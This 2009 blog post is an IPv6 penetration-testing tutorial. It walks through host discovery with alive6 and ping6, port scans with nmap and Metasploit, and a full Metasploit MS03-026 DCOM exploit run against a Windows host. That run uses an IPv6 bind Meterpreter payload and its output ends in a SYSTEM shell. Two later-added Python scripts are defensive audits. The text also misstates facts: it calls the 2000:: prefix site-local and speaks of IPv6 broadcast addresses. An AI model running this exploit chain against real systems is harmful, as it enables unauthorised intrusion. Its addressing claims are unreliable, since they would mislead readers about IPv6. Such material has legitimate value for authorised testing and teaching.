Tuesday, August 11, 2009

Exploiting IPv6 Network Stack: A Pen-tester Approach

The next-generation protocol, IP version 6, came out nearly 11 years ago but has never been used or practised in real-world network environments. This lack of adoption has not only left many machines in corporate networks without an IPv6 implementation but has also had a negative effect on networking and operating-system vendors. On the other side, its fast growth and the complexity of implementing it in various firewalls and intrusion detection/prevention appliances have exposed an attack surface, as those devices cannot block malicious IPv6 traffic. The main purpose of this article is to demonstrate the process through which a penetration tester can assess the security of an IPv6-enabled environment.

Addressing Scheme
The representation of IPv6 addresses differs a lot from the IPv4 addressing scheme. An IPv6 address consists of 128 bits (16 bytes), written as groups of four hex digits separated by colons. This gives a much wider address space and more flexibility to segment addresses. Let's take some examples to understand the inner workings of IPv6 addressing.

::1 represents loopback or localhost address (IPv4 equivalent 127.0.0.1)
::0 or :: represents ANY IPv6 address
fe80:: prefix represents link-local address
2000:: prefix represents site-local address

Attack Surface
Usually all IPv6 network nodes are configured with at least one link-local address (fe80::). While performing this automatic configuration, a router discovery request is sent to all IPv6-enabled routers on their broadcast addresses. Now, if any router responds, the node will select that site-local address (2000::) for its interface. This scenario introduces a threat where there are no active IPv6 routers and an attacker takes advantage of this to reply with a rogue address. The risk factor of such an attack is high and may cause serious damage and data-leakage problems for the organization. Using the mentioned scenario, I will demonstrate a real-world attack on an IPv6 network from a penetration-testing perspective.
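An added host-side check, not from the original post: on Linux the per-interface accept_ra and forwarding sysctls decide whether a node will act on a Router Advertisement at all, so auditing them tells a defender which interfaces are exposed to the rogue-router scenario above. The script builds a constructed stand-in for /proc/sys so it runs offline; point audit_accept_ra at the real path on a host.

```python
import os
import tempfile

# Linux exposes per-interface IPv6 settings under /proc/sys/net/ipv6/conf/<if>/.
# accept_ra: 0 = ignore Router Advertisements, 1 = accept unless the host is
# forwarding, 2 = accept even when forwarding.  forwarding: 1 on a router.


def accepts_ra(conf_dir):
    """True if the kernel would act on a Router Advertisement seen on this interface."""
    def read_int(name):
        with open(os.path.join(conf_dir, name)) as f:
            return int(f.read().strip())
    accept_ra = read_int("accept_ra")
    forwarding = read_int("forwarding")
    return accept_ra == 2 or (accept_ra == 1 and forwarding == 0)


def audit_accept_ra(proc_sys="/proc/sys"):
    """Return the interfaces on which a rogue RA could install a prefix or default router."""
    conf_root = os.path.join(proc_sys, "net", "ipv6", "conf")
    exposed = []
    for iface in os.listdir(conf_root):
        if iface in ("all", "default", "lo"):   # templates and loopback, not real links
            continue
        if accepts_ra(os.path.join(conf_root, iface)):
            exposed.append(iface)
    return sorted(exposed)


def build_sample_tree():
    """Constructed stand-in for /proc/sys so the audit can run offline (not a real host)."""
    root = tempfile.mkdtemp()
    sample = {"eth0": ("1", "0"),   # default host setting: RAs accepted
              "eth1": ("1", "1"),   # forwarding host: accept_ra=1 is ignored by the kernel
              "eth2": ("2", "1"),   # forwarding host that still accepts RAs
              "lo":   ("1", "0")}
    for iface, (accept_ra, forwarding) in sample.items():
        conf_dir = os.path.join(root, "net", "ipv6", "conf", iface)
        os.makedirs(conf_dir)
        with open(os.path.join(conf_dir, "accept_ra"), "w") as f:
            f.write(accept_ra)
        with open(os.path.join(conf_dir, "forwarding"), "w") as f:
            f.write(forwarding)
    return root


if __name__ == "__main__":
    print("interfaces that would accept a rogue RA:", audit_accept_ra(build_sample_tree()))
```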


1. IPv6 Network Configuration
To check whether your system has an IPv6 address configured on a particular interface, execute the following command:

# ifconfig eth0 | grep inet6
inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link


2. Discovery and Scanning
The IPv6 design introduces a new set of protocols for network discovery, consisting of ICMPv6 Neighbour Discovery and Neighbour Solicitation. To enumerate the network hosts, we can use the "IPv6 Attack Toolkit" published by van Hauser. This task is accomplished with the "alive6" program included in the package.

# alive6 eth0
Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx
Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy
Found 2 systems alive

The combination of the "ip" and "ping6" commands can also be used for local IPv6 node discovery.

# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1
# ip neigh | grep ^fe80
fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE
fe80::21e:c9ff:fexx:xxxx dev eth0 lladdr 00:1e:c9:xx:xx:xx REACHABLE
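As an added example (not part of the original post), the following Python script ties the addressing rules above to the discovery output: it splits the addr%zone notation that the nmap and Metasploit commands below rely on, recovers the MAC embedded in an EUI-64 link-local address such as the one in section 1, and checks neighbour-cache lines for entries whose link-layer address does not match, a useful sanity check on an inventory built from `ip neigh`. The sample neighbour lines are constructed in the format shown above.

```python
import ipaddress
import re

# Constructed sample in the format of the `ip neigh` output above; the xx
# placeholders are replaced with made-up values, nothing is from a real host.
NEIGH_SAMPLE = """\
fe80::211:43ff:fe12:3456 dev eth0 lladdr 00:11:43:12:34:56 REACHABLE
fe80::21e:c9ff:fe78:9abc dev eth0 lladdr 00:1e:c9:78:9a:bc REACHABLE
fe80::21e:c9ff:fe78:9abc dev eth0 lladdr 00:aa:bb:cc:dd:ee STALE
"""

NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr (\S+) (\S+)$")


def split_scope(target):
    """Split 'addr%zone' (e.g. fe80::1%eth0) into (IPv6Address, zone or None)."""
    addr, _, zone = target.partition("%")
    ip = ipaddress.IPv6Address(addr)
    # A link-local address is only meaningful together with an interface.
    if ip.is_link_local and not zone:
        raise ValueError("link-local address %s needs a zone such as %%eth0" % ip)
    return ip, zone or None


def mac_from_eui64(ip):
    """Recover the MAC from a modified-EUI-64 interface identifier, else None."""
    iid = ip.packed[8:]          # low 64 bits = interface identifier
    if iid[3:5] != b"\xff\xfe":  # EUI-64 splices ff:fe into the middle of the MAC
        return None
    # The universal/local bit (0x02 of the first byte) is flipped in the IID.
    mac = bytes([iid[0] ^ 0x02]) + iid[1:3] + iid[5:8]
    return ":".join("%02x" % b for b in mac)


def check_neighbours(text):
    """Parse `ip neigh` lines; flag entries whose lladdr disagrees with the EUI-64 MAC."""
    findings = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if not m:
            continue
        addr, dev, lladdr, state = m.groups()
        ip = ipaddress.IPv6Address(addr)
        expected = mac_from_eui64(ip)
        consistent = expected is None or expected == lladdr.lower()
        findings.append((ip.compressed, dev, lladdr, state, consistent))
    return findings
```

A mismatch such as the third sample row (same address, different lladdr) is worth investigating: either the host changed its NIC or something else is answering for that address.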


3. Service Enumeration
To find the open ports running specific services on a target IPv6 machine, an attacker can simply use Nmap as follows:

# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx%eth0
Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-27 13:57 CDT
PORT STATE SERVICE
22/tcp open ssh

The same task can be done through the Metasploit Framework's TCP port scanner, which includes full support for IPv6 addresses.

# msfconsole
msf> use auxiliary/discovery/portscan/tcp
msf auxiliary(tcp) > set RHOSTS fe80::xxxx:xxxx:xxxx:xxxx%eth0
msf auxiliary(tcp) > set PORTSTART 1
msf auxiliary(tcp) > set PORTSTOP 10000
msf auxiliary(tcp) > run
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:135
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:445
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1025
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1026
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1027
[*] Auxiliary module execution completed


4. Exploitation
To move towards the penetration stage, it is vital to determine the set of vulnerable services running on the target machine. For instance, consider the following Nmap results from scanning the IPv6 interface of a Windows host.

# nmap -6 -p1-10000 -n fe80::24c:44ff:fe4f:1a44%eth0
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
554/tcp open rtsp
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1032/tcp open iad3
1034/tcp open unknown
1035/tcp open unknown
1036/tcp open unknown
1755/tcp open wms
9464/tcp open unknown

As we know, the Metasploit Framework supports IPv6 sockets. This allows us to use almost any auxiliary and exploit module against IPv6 hosts, the same as against IPv4. For the purpose of demonstration, I have used the MS03-026 (Blaster) exploit to penetrate the DCERPC endpoint mapper service (port 135) and get a root shell (NT AUTHORITY\SYSTEM).

msf> use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST fe80::24c:44ff:fe4f:1a44%eth0
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
msf exploit(ms03_026_dcom) > set LPORT 4444
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...][135]
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


References:

THC IPv6 Attack Toolkit - http://freeworld.thc.org/thc-ipv6/
The Metasploit Framework - http://metasploit.com
nmap - http://nmap.org/
IPv6 Site - http://www.ipv6.org/
RFC 2461 - http://www.ietf.org/rfc/rfc2461.txt